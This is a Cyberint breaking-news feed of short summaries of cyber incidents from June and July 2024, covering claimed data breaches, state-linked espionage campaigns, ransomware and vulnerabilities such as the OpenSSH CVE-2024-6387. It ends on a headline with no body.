Breaking Cyber News From Cyberint

Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.

  • Jul 15, 2024

    • Handala
    • Sheba Medical Center
    • exclusive
    • Middle East
    • Israel
    • Innovalve Bio Medical Ltd.
    • Asia

    'Handala' has claimed responsibility for an attack against 'Sheba Medical Center'

    The Pro-Palestinian threat actor group "Handala" has claimed responsibility for breaching the Israeli hospital "Sheba Medical Center" as part of their "OPIsrael" campaign. The group claims to have access to every department but has initially focused on the "Heart Department of Sheba and Innovalve Bio Medical Ltd" as a warning. They have released 50GB of sample data, which allegedly includes medical and personal information of the company's clients, agreements, staff details, and financial documents, and according to their statement, they plan to release a total of 5TB of company information.

  • Jul 15, 2024

    • SportClick
    • exclusive
    • Brazil
    • Chucky
    • Media
    • Latin America And The Caribbean

    Threat Actor Chucky leaked a database potentially related to SportClick Brazil's clients

    The threat actor Chucky leaked, on the leakbase[.]io forum, a database potentially related to 628K clients of the Brazilian site sportclick.com.br. The exposed information includes sensitive client data such as user IDs, names, email addresses, passwords, etc.

  • Jul 15, 2024

    • Mustang Panda
    • spyware
    • Greece
    • Netherlands
    • China
    • Norway

    Cyberattack Targets European Maritime Industry: Mustang Panda Suspected

    A coordinated cyberespionage campaign has targeted European shipping companies, including Norwegian, Greek, and Dutch vessels. The attacks involved USB drives loaded with malware, aiming to steal sensitive information. Experts attribute the campaign to the China-affiliated hacker group Mustang Panda, known for using the Korplug malware in previous cyberattacks. This marks the first time a China-linked group has focused on commercial shipping. The Norwegian Coastal Administration suggests the attackers sought insights into the maritime sector. There may be unreported incidents, highlighting the need for increased vigilance.

  • Jul 15, 2024

    • Belgium
    • NATO
    • Europe

    NATO Allies Establish Integrated Cyber Defence Centre in Belgium

    NATO has agreed to establish the NATO Integrated Cyber Defence Centre (NICC) at its strategic military headquarters, SHAPE, in Belgium. This initiative, decided during the summit on July 10, 2024, aims to enhance NATO and Allied network security, improve situational awareness in cyberspace, and strengthen collective resilience against sophisticated cyber threats.

  • Jul 15, 2024

    • United Kingdom
    • Europe
    • Business Services
    • mSpy

    Hacktivists gained access to a spyware maker's database, publishing millions of users' information online

    In May 2024, mSpy, a spyware maker, fell victim to a data breach when hacktivists obtained and published online 142GB of user data and support tickets. The data included 2.4 million unique email addresses, IPs, names, and photos, largely consisting of support tickets seeking assistance in installing the spyware.

  • Jul 15, 2024

    • AT&T Wireless
    • North America
    • Telecommunications
    • United States

    AT&T falls victim to a data breach following Snowflake attacks exposing over 100 million customers

    In April 2024, AT&T, a U.S.-based telecommunications company, fell victim to a data breach when threat actors gained access to a Snowflake account and stole the call logs of nearly 110 million customers. The data included customers' phone numbers and the phone numbers of the people those customers interacted with.

  • Jul 11, 2024

    • exclusive
    • Energy
    • Middle East
    • Israel
    • Sonol
    • Asia
    • Handala

    'Handala Hack' Targets Israeli Energy Company 'Sonol'

    The hacker group "Handala Hack" has announced a breach of the Israeli energy company "Sonol" as part of the OPIsrael campaign. The group claims to have obtained 54GB of internal company data and has released a sample of the allegedly stolen information, including details about clients and their activities in the company's branches.

  • Jul 11, 2024

    • Energy
    • exclusive
    • Mexico
    • Pemex
    • Latin America And The Caribbean
    • PanchoVilla

    PanchoVilla claims to have compromised a server of the Mexican Oil Company (PEMEX)

    On July 8th, the threat actor PanchoVilla published on the cybercrime forum BreachForums that he had compromised a server of the Mexican oil company (PEMEX), obtaining over 50 databases. Additionally, a sample screenshot was provided. The threat actor is selling the database for $1,000 USD.

  • Jul 11, 2024

    • arrest
    • South-Eastern Asia
    • National Bureau Of Investigation (NBI)
    • Asia
    • Philippines

    Four Members of Blood Security Hackers Apprehended in an Entrapment Operation by National Bureau of Investigation (NBI)

    On July 10, 2024, the National Bureau of Investigation (NBI) released a press statement regarding the arrest of four "Blood Security Hackers" members, namely:

    • Eden Glenn Petilo y Oñez
    • Carlo Reyna y Placido
    • John Kenneth Macarampat
    • Leonel Obina y Laraga

    These threat actors were responsible for past cyber intrusions, including, but not limited to, the COMELEC and Sky Cable data breaches. They are also notorious for past illegal carding activities.

  • Jul 10, 2024

    • Finance
    • Latin America And The Caribbean
    • Mekotio

    Mekotio Banking Trojan Targeting Latin America

    Mekotio malware, a banking trojan, has made a comeback in recent weeks and was witnessed targeting financial organizations within Latin America.

  • Jul 08, 2024

    • DragonForce
    • exclusive

    DragonForce Outlines Requirements for New RaaS Partners

    DragonForce is extending an invitation to specialists from various fields, including access experts and pentesters, to join their team. They offer infrastructure and tools, retaining only 20% of income while partners keep 80%. In their latest post, DragonForce emphasizes the importance of carefully selecting candidates for their Ransomware-as-a-Service (RaaS). Prospective partners are required to prepare a target with an income of at least $5,000,000 and provide detailed ZoomInfo information about that target. Files matching the provided ZoomInfo must be uploaded to a convenient storage location, such as mega.co.nz or SSH. To ensure a smooth process, DragonForce advises candidates to contact them in advance to agree on all details, facilitating faster access to their RaaS.

  • Jul 08, 2024

    • Global
    • exclusive

    Massive RockYou2024 Password List Allegedly Leaked with Nearly 10 Billion Entries

    A threat actor claims to have leaked a new version of the infamous RockYou password list, dubbed RockYou2024. This updated compilation reportedly includes over 9.9 billion passwords, making it one of the largest collections of compromised credentials to date. According to the threat actor, RockYou2024 builds on the previous RockYou21 list, aggregating data from numerous recent database leaks shared across various forums over the years. This enormous compilation presents a significant security risk, providing cybercriminals with an extensive repository of passwords for credential stuffing and other malicious activities. The original RockYou list, exposed in 2009 after a breach at RockYou.com, contained 32 million passwords and has since been a crucial tool for hackers, inspiring several expanded versions as new breaches emerged.

  • Jul 07, 2024

    • crypto
    • global
    • malware

    Ethereum mailing list breach exposes 35,000 to crypto draining attack

    A threat actor compromised Ethereum's mailing list provider, sending phishing emails to over 35,000 addresses with a link to a malicious site running a crypto drainer. Ethereum disclosed the incident in a blog post, confirming no material impact on users. The attack occurred on June 23, using the email address ‘updates@blog.ethereum.org,’ and targeted 35,794 addresses with a fake promotion offering a 6.8% APY on staked Ethereum. Recipients were directed to a professionally crafted, malicious website that drained wallets if users connected and signed the transaction. Ethereum's internal security team quickly blocked further emails, alerted the community, and ensured the malicious link was blocked by Web3 wallet providers and Cloudflare. No recipients were affected, and Ethereum has since migrated some email services to prevent future incidents.

  • Jul 07, 2024

    • Ticketmaster
    • Retail
    • North America
    • United States

    Threat actors Leak Taylor Swift Ticket Data, Demand $2 Million Extortion

    Threat actors have leaked barcode data for 166,000 Taylor Swift Eras Tour tickets, threatening to release more if a $2 million extortion demand is not met. In May, the threat actor ShinyHunters began selling data on 560 million Ticketmaster customers for $500,000, which was confirmed to be from Ticketmaster’s account on Snowflake, a cloud-based data warehousing company. The breach, starting in April, involved hackers downloading Snowflake databases from at least 165 organizations using stolen credentials, then blackmailing companies for payments. Confirmed victims include Neiman Marcus, Los Angeles Unified School District, and Advance Auto Parts. The latest leak by Sp1d3rHunters includes ticket data for Taylor Swift concerts in Miami, New Orleans, and Indianapolis, with a threat to leak data from other events if the ransom isn't paid. Ticketmaster clarified that unique barcodes are refreshed every few seconds, making the stolen tickets unusable. They also confirmed they did not negotiate with the threat actors, countering ShinyHunters' claims of being offered $1 million to delete the data.

  • Jul 07, 2024

    • Global
    • North America
    • United States
    • Authy
    • Business Services

    Twilio Secures Authy Endpoint After Breach Exposes 33 Million Phone Numbers

    Cloud communications provider Twilio has disclosed that unidentified threat actors exploited an unauthenticated endpoint in Authy, exposing data associated with Authy accounts, including users' cell phone numbers. In response, Twilio secured the endpoint to prevent further unauthorized access. This revelation follows a breach by the online persona ShinyHunters (which we exposed exclusively), who published a database containing 33 million phone numbers from Authy accounts on BreachForums. Authy, a popular two-factor authentication (2FA) app owned by Twilio, adds an extra layer of security to accounts. Twilio assured users that there is no evidence of the threat actors accessing Twilio's systems or other sensitive data. However, they recommend that users update their Authy apps to the latest versions and remain vigilant against potential phishing and smishing attacks using their phone numbers.

  • Jul 07, 2024

    • global
    • supplychain

    Widespread Polyfill.io Supply Chain Attack Affects Over 380,000 Hosts, Including Major Companies

    The supply chain attack on the Polyfill[.]io JavaScript library is more extensive than initially believed, affecting over 380,000 hosts, including prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson. New findings from Censys reveal that these hosts are embedding scripts from the malicious domain as of July 2, 2024, with many located within the Hetzner network in Germany. The attack, which emerged in late June 2024, involves code modifications that redirect users to adult- and gambling-themed websites at specific times. The domain, sold to Chinese company Funnull in February 2024, has since been suspended by Namecheap, with further mitigation efforts from Cloudflare and Google. The attackers attempted to relaunch the service under different domains, with one still active. A broader network of potentially related malicious domains has also been uncovered, suggesting this incident is part of a larger campaign. WordPress security firm Patchstack has warned of cascading risks to sites using legitimate plugins linked to the rogue domain.

  • Jul 04, 2024

    • CVE-2021-40444
    • Microsoft Mshtml
    • Mshtml

    Threat Actors Exploit MSHTML Flaw to Deploy MerkSpy Surveillance Tool in Targeted Campaigns

    Unknown threat actors have been exploiting a patched security flaw in Microsoft MSHTML to deliver a surveillance tool called MerkSpy, targeting users in Canada, India, Poland, and the U.S. The attack begins with a Microsoft Word document disguised as a job description for a software engineer. Opening the document triggers CVE-2021-40444, a high-severity flaw in MSHTML, allowing remote code execution. This leads to the download of an HTML file, which executes shellcode to download and run further malicious payloads, including MerkSpy. MerkSpy establishes persistence on the compromised system through Windows Registry changes and captures sensitive information such as screenshots, keystrokes, login credentials, and data from the MetaMask browser extension. This data is then transmitted to an external server controlled by the attackers. In parallel, Symantec reported a smishing campaign in the U.S., where users receive SMS messages purportedly from Apple, directing them to bogus credential-harvesting pages. This malicious website includes a CAPTCHA to appear legitimate and mimics an outdated iCloud login template.

  • Jul 04, 2024

    • global
    • arrest

    Global Police Operation Shuts Down 600 Cybercrime Servers and Arrests 54 Individuals

    A coordinated law enforcement operation named MORPHEUS has dismantled nearly 600 servers used by cybercriminal groups associated with Cobalt Strike, a red teaming framework. The crackdown, led by the UK National Crime Agency and involving multiple international authorities, targeted older, unlicensed versions of Cobalt Strike between June 24 and 28. Of the 690 flagged IP addresses, 590 are no longer accessible. While Cobalt Strike is a legitimate tool for IT security, cracked versions have been misused by malicious actors for post-exploitation purposes, significantly lowering the barrier to cybercrime. In parallel, Spanish and Portuguese authorities arrested 54 individuals involved in vishing schemes targeting elderly citizens, resulting in €2,500,000 in losses. The fraudsters posed as bank employees to extract personal information and subsequently pressured victims into handing over their credit cards and bank details. The stolen funds were funneled through a sophisticated money laundering network. Additionally, INTERPOL dismantled human trafficking rings and disrupted global online scam networks, seizing $257 million in assets and arresting nearly 4,000 suspects across 61 countries in Operation First Light.

  • Jul 03, 2024

    • IntelBroker
    • North America
    • United States
    • Cognizant
    • Business Services

    Threat Actor "IntelBroker" Allegedly Breached Cognizant, Extracting 12 Million Records

    In June 2024, a threat actor named "IntelBroker" claimed to have breached Cognizant, an IT solutions provider, and to have gained access to its Oracle Insurance Policy Administration database. According to the threat actor, 12 million records belonging to approximately 40 thousand users were exposed, including policy numbers, client names, and client companies, among other fields.

  • Jul 03, 2024

    • Canada
    • 888
    • Shopify
    • North America
    • Business Services

    Threat Actor Allegedly Breached Shopify, Extracting User Information

    In July 2024, a threat actor named "888" claimed to have breached Shopify, a Canada-based multinational eCommerce Platform, and to have gained access to a database. According to the threat actor, nearly 180 thousand customer records were taken including names, email addresses, phone numbers, orders made, total spent, and email / SMS subscription details. The threat actor has offered the dataset for sale.

  • Jul 02, 2024

    • Remote Services
    • CVE-2024-6387 - RCE Vulnerability in OpenSSH
    • CVE-2024-6387

    CVE-2024-6387 - RCE Vulnerability in OpenSSH

    A critical remote code execution (RCE) vulnerability, CVE-2024-6387, has been discovered in OpenSSH’s server by the Qualys research team. This vulnerability reintroduces an issue previously addressed in 2006, highlighting persistent security challenges in widely used software. Despite the difficulty of exploiting this flaw, its severity is underscored by its potential impact on systems that rely on SSH, particularly for accessing Kubernetes nodes. No successful remote attacks have been reported yet, but the vulnerability's presence emphasizes the importance of ongoing vigilance and prompt system updates. CVE-2024-6387 arises from a signal handler race condition in OpenSSH’s default configuration. If an SSH client fails to authenticate within the default LoginGraceTime of 120 seconds, the SIGALRM handler is called, potentially leading to heap corruption and arbitrary code execution with root privileges. While widespread exploitation is considered unlikely due to the need for distribution-specific conditions and extensive login attempts, the risk remains significant. Organizations are urged to upgrade to the latest OpenSSH release and consider temporary workarounds, such as setting LoginGraceTime to 0, to protect their systems from potential attacks.

  • Jul 01, 2024

    • Chrome
    • Education
    • Office
    • South Korea
    • APT43
    • CVE-2017-11882
    • Eastern Asia
    • Asia

    Kimsuky Using TRANSLATEXT Chrome Extension to Steal Sensitive Data

    The North Korea-linked threat actor Kimsuky has been linked to a new malicious Google Chrome extension designed to steal sensitive information as part of an ongoing intelligence collection effort. Observed in early March 2024 and codenamed TRANSLATEXT, the extension is capable of gathering email addresses, usernames, passwords, cookies, and browser screenshots. This targeted campaign focuses on South Korean academia, specifically those involved in North Korean political affairs. The initial access method for this activity remains unclear, though Kimsuky is known for using spear-phishing and social engineering attacks to initiate infection. The attack begins with a ZIP archive, allegedly related to Korean military history, containing a Hangul Word Processor document and an executable file. Executing the file retrieves a PowerShell script from an attacker-controlled server, which exports information about the compromised victim to a GitHub repository and downloads additional PowerShell code via a Windows shortcut (LNK) file. Researchers found a GitHub account, created on February 13, 2024, briefly hosting the TRANSLATEXT extension under the name "GoogleTranslate.crx," although the delivery method remains unknown. TRANSLATEXT, disguised as Google Translate, uses JavaScript code to bypass security measures for services like Google, Kakao, and Naver; steal email addresses, credentials, and cookies; capture browser screenshots; and exfiltrate stolen data. It also fetches commands from a Blogger Blogspot URL to take screenshots of newly opened tabs and delete all cookies from the browser.

  • Jul 01, 2024

    • Germany
    • Redline Stealer
    • Canada
    • Middle East
    • Mystic Stealer
    • RisePro
    • Eastern Europe
    • Asia
    • India
    • Turkey
    • North America
    • Smoke Loader
    • Southern Asia
    • Amadey
    • Western Europe
    • Europe
    • Russia
    • Enigma Loader
    • United States
    • Unfurling Hemlock

    New Unfurling Hemlock threat actor floods systems with malware

    A threat actor known as Unfurling Hemlock has been conducting large-scale malware campaigns, infecting target systems with up to ten different types of malware simultaneously. Security researchers have identified this method as a "malware cluster bomb," where one malware sample spreads additional malicious software on the compromised machine. The malware types include information stealers, botnets, and backdoors. The operation, active since at least February 2023, uses a distinct distribution method involving nested compressed files within a malicious executable named 'WEXTRACT.EXE'. This file arrives via malicious emails or malware loaders and unpacks multiple malware variants in reverse order on the victim's machine. Over 50,000 such "cluster bomb" files have been linked to Unfurling Hemlock, with the majority of attacks targeting systems in the United States, Germany, Russia, Turkey, India, and Canada. Unfurling Hemlock's strategy of deploying multiple payloads provides high redundancy, enhancing persistence and monetization opportunities despite the risk of detection. The malware observed includes Redline, RisePro, Mystic Stealer, Amadey, SmokeLoader, protection disablers, and various utilities for disabling security features and obfuscating malware payloads. The group's activities suggest they may sell info-stealer logs and initial access to other threat actors. Based on linguistic evidence and the use of specific hosting services, researchers believe Unfurling Hemlock operates from an Eastern European country.

  • Jun 30, 2024

    • CVE-2024-5806

    Exploit Attempts Recorded Against New MOVEit Transfer Vulnerability

    A critical security flaw in Progress Software's MOVEit Transfer, identified as CVE-2024-5806 with a CVSS score of 9.1, is already seeing exploitation attempts following its public disclosure. The flaw involves an authentication bypass in specific versions of MOVEit Transfer, potentially allowing attackers to impersonate any user on the server. Another related vulnerability, CVE-2024-5805, also affects MOVEit Gateway version 2024.0.0. watchTowr Labs highlighted that CVE-2024-5806 comprises two separate issues, one in MOVEit and the other in the IPWorks SSH library. Progress Software has advised users to block public RDP access to MOVEit servers and limit outbound access to trusted endpoints to mitigate these vulnerabilities. Exploiting CVE-2024-5806 requires knowledge of an existing username, remote authentication capability, and public accessibility of the SFTP service. Censys data shows around 2,700 MOVEit Transfer instances online, mostly in the U.S., U.K., and Germany, among other countries. The urgency of updating to the latest versions is emphasized, especially after similar vulnerabilities led to widespread Cl0p ransomware attacks last year. Meanwhile, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported an intrusion into its Chemical Security Assessment Tool (CSAT) due to flaws in the Ivanti Connect Secure appliance. Although no data exfiltration was detected, the agency warned of potential unauthorized access to sensitive information. Progress Software confirmed the vulnerabilities have been fixed and stated there have been no reports of exploitation or direct operational impact on customers.

  • Jun 30, 2024

    • Finance
    • exclusive
    • CredRight
    • Southern Asia
    • Asia
    • India

    Threat Actor Allegedly Leaks 70 GB of KYC Data from CredRight

    A threat actor has claimed to have leaked data from CredRight, a data-driven lending platform that provides credit to micro, small, and medium enterprises through NBFCs and banks. CredRight streamlines the loan application process by allowing users to register online, upload necessary documents, and apply for loans quickly. The threat actor operates accounts on several dark web forums and posted the data on two different underground forums. The alleged breach includes 70 GB of KYC (Know Your Customer) documents, comprising photos, videos, and voice recordings. This leak could potentially expose sensitive personal and financial information of numerous CredRight users, raising significant security and privacy concerns for the affected individuals and the platform.

  • Jun 30, 2024

    • Finance
    • Neiman Marcus
    • exclusive
    • North America
    • United States

    ShinyHunters group leaks Data from Neiman Marcus

    According to a post on a dark web forum, a threat actor has shared data purportedly from Neiman Marcus. The post claims that the alleged leak includes account balances, browser user agent details, credit cards, dates of birth, email addresses, gift cards, IP addresses, names, payment histories, payment methods, phone numbers, and physical addresses. The threat actor also mentioned that Neiman Marcus refused to pay the ransom.

  • Jun 30, 2024

    • 8220 Gang
    • CVE-2023-21839
    • k4spreader
    • PureCrypter
    • CVE-2017-10271
    • Tsunami
    • Weblogic Server
    • CVE-2017-3506

    8220 Gang Exploits Oracle WebLogic Server Flaws

    Security researchers have uncovered more details about the 8220 Gang's cryptocurrency mining operation, which exploits known security flaws in Oracle WebLogic Server. Researchers revealed that the threat actor, tracked as Water Sigbin, uses fileless execution techniques such as reflective DLL injection and process injection to avoid disk-based detection. Water Sigbin exploits vulnerabilities like CVE-2017-3506, CVE-2017-10271, and CVE-2023-21839 to gain initial access and deploy the miner payload via a multi-stage loading technique. The attack sequence involves deploying a PowerShell script to drop a first-stage loader, which then launches another binary in memory. This binary serves as a conduit for the PureCrypter loader, which exfiltrates hardware information and creates scheduled tasks to run the miner while evading Microsoft Defender Antivirus. Further developments include the use of a new installer tool called k4spreader, which the 8220 Gang has been using since at least February 2024. This tool delivers the Tsunami DDoS botnet and the PwnRig mining program, leveraging security flaws in Apache Hadoop YARN, JBoss, and Oracle WebLogic Server to infiltrate targets. Written in cgo, k4spreader ensures system persistence, self-updates, and executes other malware while disabling firewalls and terminating rival botnets. The QiAnXin XLab team has detailed this tool, highlighting its capabilities and ongoing development.

  • Jun 24, 2024

    • Sub-Saharan Africa
    • APT31
    • Taiwan
    • Hong Kong
    • South Korea
    • Kenya
    • Djibouti
    • Rwanda
    • Eastern Asia
    • Malaysia
    • Asia
    • Philippines

    Flax Typhoon Cyber Espionage Campaign Hits 75 Taiwanese Organizations

    A likely China-linked state-sponsored threat actor, tracked as RedJuliett, has been linked to a cyber espionage campaign targeting government, academic, technology, and diplomatic organizations in Taiwan between November 2023 and April 2024. RedJuliett, also known as Flax Typhoon and Ethereal Panda, operates from Fuzhou, China, and supports Beijing's intelligence collection goals related to East Asia. The campaign has targeted 24 organizations, including government agencies in Taiwan, Laos, Kenya, and Rwanda, and at least 75 Taiwanese entities for broader reconnaissance and exploitation. RedJuliett employs tactics such as exploiting internet-facing appliances, SQL injection, and directory traversal attacks to gain initial access. They use open-source software like SoftEther for tunneling malicious traffic and living-off-the-land (LotL) techniques to avoid detection. The group's operations include using web shells like China Chopper, devilzShell, AntSword, and Godzilla, and exploiting Linux vulnerabilities such as DirtyCow (CVE-2016-5195). RedJuliett's interest likely lies in gathering intelligence on Taiwan's economic policy, trade, and diplomatic relations. Their focus on internet-facing devices highlights the limited visibility and security of these devices, making them effective targets for initial access.

  • Jun 24, 2024

    • Ratel
    • Donot Team

    Ratel RAT targets outdated Android phones in ransomware attacks

    The open-source Android malware 'Ratel RAT' is being widely deployed by cybercriminals to attack outdated devices, often locking them down with a ransomware module that demands payment via Telegram. Researchers detected over 120 campaigns using Ratel RAT, with known threat actors such as APT-C-35 (DoNot Team) involved, and origins traced to Iran and Pakistan. High-profile targets include government and military organizations, mainly in the United States, China, and Indonesia. Most infected devices run end-of-life Android versions (11 and older), which no longer receive security updates, making them particularly vulnerable. Ratel RAT is spread through fake apps mimicking popular brands like Instagram and WhatsApp, tricking users into downloading malicious APKs. During installation, it requests risky permissions to run in the background. The malware supports various commands, including file encryption (ransomware), file deletion, screen locking, SMS and location tracking. In roughly 10% of cases analyzed by Check Point, the ransomware command was issued. To defend against these attacks, users should avoid downloading APKs from untrusted sources, refrain from clicking on suspicious links, and use Play Protect to scan apps before launching them.

  • Jun 23, 2024

    • SugarGh0st
    • Middle East
    • Government
    • Turkmenistan
    • SneakyChef
    • Mining
    • Asia
    • India
    • SpiceRAT
    • Saudi Arabia
    • Telecommunications
    • Southern Asia
    • Sub-Saharan Africa
    • Northern Europe
    • Europe
    • Angola
    • Central Asia
    • Latvia
    • Africa

    Chinese Threat Actors Deploy SpiceRAT and SugarGh0st in Global Espionage Campaign (Operation Diplomatic Specter)

    Since August 2023, a previously undocumented Chinese-speaking threat actor codenamed SneakyChef has been linked to an espionage campaign primarily targeting government entities across Asia, Europe, the Middle East, and Africa with the SugarGh0st malware. SneakyChef uses lures resembling scanned documents from government agencies, focusing on Ministries of Foreign Affairs and embassies. In addition, the same malware used in this campaign is likely targeting various government entities across Angola, India, Latvia, Saudi Arabia, and Turkmenistan, based on the lure documents used in the spear-phishing campaigns, indicating a widening of the scope of the countries targeted. The campaign, also tracked as Operation Diplomatic Specter, has targeted the government, IT, metallurgy, mining, and telecommunications sectors. SneakyChef utilizes sophisticated tactics, including supply chain attacks and deploying new malware like SpiceRAT, which employs DLL side-loading techniques for evasion and persistence. This underscores the growing threat from advanced persistent threat actors targeting critical infrastructure globally.

  • Jun 23, 2024

    • Finance
    • exclusive
    • North America
    • United States
    • T-Mobile US

    IntelBroker allegedly breached a giant telecom vendor

    The threat actor IntelBroker has allegedly leaked data from telecommunications giant T-Mobile. The compromised information reportedly includes source code, SQL files, images, Terraform data, certifications, and siloprograms. IntelBroker shared several images of the leaked data but did not specify a price, inviting interested buyers to message them with offers. The threat actor advised against messages from users without rank or reputation. Payments are accepted only in Monero (XMR).

  • Jun 23, 2024

    • exclusive
    • Europe
    • Northern Europe
    • Retail
    • Ireland

    Threat Actor Claims to Sell Unauthorized Access to Major Irish Retailer

    A threat actor has recently surfaced, claiming to sell unauthorized access to the network of a major Irish retailer with annual revenue exceeding $500 million. This access, categorized as AnyConnect (AD), could grant significant control over the retailer's network infrastructure. Priced at $800, the access details and verification are provided only to reputable users, old users, or those with a deposit or premium status on their platform. This restricted sharing ensures the access remains secure and maintains trust within their dealings.

  • Jun 19, 2024

    • Technology
    • Global
    • Intelbroker
    • Apple
    • North America
    • United States

    Threat Actor "IntelBroker" Allegedly Breached Apple, Gaining Access to Internal Source Code

    In June 2024, a threat actor named "IntelBroker" claimed to have breached Apple, a multinational technology company, and to have gained access to internal source code. According to the threat actor, three commonly used tools from Apple's internal site were compromised, named AppleConnect-SSO, Apple-HWE-Confluence-Advanced, and AppleMacroPlugin.

  • Jun 18, 2024

    • Technology
    • Advanced Micro Devices (Amd)
    • Intelbroker
    • North America
    • United States

    Threat Actor "IntelBroker" Allegedly Breached AMD, Gaining Access To Databases, Source Code And Future Products

    In June 2024, a threat actor named "IntelBroker" claimed to have breached AMD, an international semiconductor and electronics manufacturer, and to have gained access to its systems. According to the threat actor, future products, specification sheets, employee and customer databases, property files, ROMs, source code, firmware, and finance information were compromised. The threat actor has offered the data for sale.

  • Jun 17, 2024

    • Ph1Ns
    • South-Eastern Asia
    • Philippine National Police (Pnp)
    • Asia
    • Business Services
    • Philippines

    Philippine National Police (PNP) suffered multiple data breaches - May 2024

    In May 2024, the Philippine National Police (PNP) suffered multiple data breaches. These breaches exposed a massive amount of sensitive data affecting not only PNP officers but also Philippine citizens — including high-ranking individuals such as the Philippine President, Vice President, House Speaker, some senators, and many more. The attacks were mainly performed by a threat actor dubbed “PH1NS” — a well-known hacker in the Philippine Threat Landscape — who is also the one behind the recent DOST breach in April 2024.

  • Jun 16, 2024

    • Asia
    • South-Eastern Asia
    • Philippine Statistics Authority
    • Philippines

    Philippine Statistics Authority Leak

    In October 2023, a local threat group that Cyberint had been monitoring leaked files allegedly owned by the Philippine Statistics Authority (PSA). As of this writing, the post and the social media page of the threat actor have been taken down, but Cyberint was able to obtain the files from the supposed PSA leak. According to the threat group, the total number of leaked records from the database is 42 billion; after further checking and downloading the leaked files, the total size of the leak is 2.1GB across 3,358 files. The threat group uploaded the whole leak on separate “Anonymous” pages, but Cyberint was able to download the full leak from a Google Drive link provided by the threat group. Analysis of some of the leaked files confirmed that they contain PSA data, such as certification passes for PSA's ongoing “Community-Based Monitoring System” project being deployed to all LGUs in the Philippines. Some of the analyzed files contain further PII, such as local barangay officials' and residents' data.

  • Jun 16, 2024

    • Mustang Panda
    • South-Eastern Asia
    • Philippine Government
    • Government
    • Asia
    • Philippines

    Social Media Advertisements Being Leveraged For Fraudulent/Malicious Activity by Mustang Panda

    The relationship between China and the Philippines has experienced significant strain in recent months. Early in August, a Chinese Coast Guard ship fired its water cannon at a Philippine vessel carrying supplies to the contested Second Thomas Shoal in the Spratly Islands. In response, the Philippines has announced plans for joint patrols with the United States and naval exercises with Australia. Additionally, it has been reported that the Philippine Coast Guard has ended communication with its Chinese counterparts and removed Chinese barriers erected near the disputed Scarborough Shoal.

    Concurrently with these real-world events, research shows that Mustang Panda ran three cyber espionage campaigns in August. These campaigns are believed to have targeted entities in the South Pacific, including the Philippine government. The campaigns utilized legitimate software such as Solid PDF Creator and SmadavProtect, an Indonesian antivirus solution, to execute malicious files on target systems. The threat actors also devised a clever approach of cloaking the malware's command-and-control communications to mimic legitimate Microsoft traffic.

    Mustang Panda is a Chinese advanced persistent threat (APT) group that has been operating since at least 2012. The group is believed to be affiliated with the Chinese government and has been linked to a number of cyberespionage campaigns targeting government entities, nonprofits, and other organizations in North America, Europe, and Asia.

    On August 1, 2023, it was observed that a Mustang Panda malware package was hosted for download on Google Drive. The threat actors had disguised the malware package as a ZIP file named "230728 meeting minutes.zip". Upon opening the extracted folder, victims are presented with an application named "20230728 meeting minutes.exe" bearing a PDF icon. This file is a renamed copy of the legitimate Solid PDF Creator software. However, unbeknownst to the victims, the folder also contains a hidden file named "SolidPDFCreator.dll". Executing the seemingly harmless "20230728 meeting minutes.exe" triggers the side-loading of the malicious DLL residing in the same folder. Once loaded, the malicious DLL communicates with 45.121.146[.]113 to establish a command-and-control (C2) connection. Our assessment indicates that an entity affiliated with the Philippine government encountered this initial malware package as early as August 1, 2023.

    The third campaign, created on August 16, 2023, mirrors the structure of the first campaign. However, the ZIP and EXE filenames differ, with the third campaign using "Labour Statement.zip" instead of "230728 meeting minutes.zip" from the first instance. Upon extracting the ZIP file's contents, victims encounter two files. The first file, "Labour Statement.exe", is a harmless copy of the Solid PDF Creator software. The second file, identified as "SolidPDFCreator.dll", harbors malicious intent. Executing the seemingly innocuous "Labour Statement.exe" triggers the loading of the malicious DLL residing in the same folder. Subsequently, the malicious DLL establishes a connection with 45.121.146[.]113, mirroring the command-and-control (C2) communication pattern observed in the previous two campaigns.

  • Jun 16, 2024

    • Finance
    • exclusive
    • Development Bank Of The Philippines
    • South-Eastern Asia
    • Asia
    • Philippines

    Asia United Bank and Development Bank of the Philippines Leak

    Recently, two local banks, namely Asia United Bank and Development Bank of the Philippines, have been mentioned in two separate alleged compromises. This is a notable event compared to the trend of customer phishing that is regularly seen in the banking industry of the Philippines. It is rare to see threat actors targeting the banks themselves instead of their customers – which is usually the easiest and the more financially rewarding crime. Cyberint conducted a HUMINT procedure to try and obtain this leaked data for analysis, but to no avail. Investigation into the threat actors and the samples available yielded some insights that can be of value to other banks.

  • Jun 16, 2024

    • Cl0P
    • Bridgeway Communication System
    • exclusive
    • Philippines
    • South-Eastern Asia
    • Telecommunications
    • Communications
    • Goanywhere Mft
    • Asia
    • CVE-2023-0669

    ICT solutions provider Bridgeway Attacked by Cl0p Ransomware Group

    In March 2023, the Cl0p ransomware group claimed they stole data from companies by exploiting a zero-day vulnerability in the GoAnywhere MFT secure file-sharing solution. The list of recent victims of the Cl0p ransomware group includes the local health care provider Intellicare and the ICT solutions provider Bridgeway. The zero-day vulnerability in GoAnywhere MFT that was exploited by the Cl0p ransomware group is now tracked as CVE-2023-0669. The developers of GoAnywhere MFT warned customers in February that a zero-day remote code execution vulnerability was being exploited on exposed admin consoles. GoAnywhere MFT is a secure web transfer solution which allows companies to securely transfer encrypted files with partners while keeping detailed audit logs of who accessed the files.

  • Jun 15, 2024

    • Noname057(16)
    • Technology
    • Botnet
    • exclusive
    • Canada
    • Usersec
    • North America
    • Telecommunications
    • Web Ddos
    • Network Denial Of Service

    NoName057(16) and UserSec Allegedly Attacked Canada

    Threat actors posted messages about attacks on several Canadian organizations on their Telegram channels. NoName057(16) announced their collaboration with UserSec to target Canada's internet infrastructure, allegedly taking down multiple websites. UserSec claimed they launched a large-scale attack on major Canadian provider Telus Corp. At the same time, NoName057(16) stated they attacked the Canadian Radio-Television and Telecommunications Commission and Investment Quebec, a government corporation. The messages included hashtags expressing their hostility towards NATO and Canada.

  • Jun 15, 2024

    • United Kingdom
    • Europe
    • Health Services
    • Healthcare
    • Qilin

    London hospitals cancel over 800 operations after Qilin ransomware attack

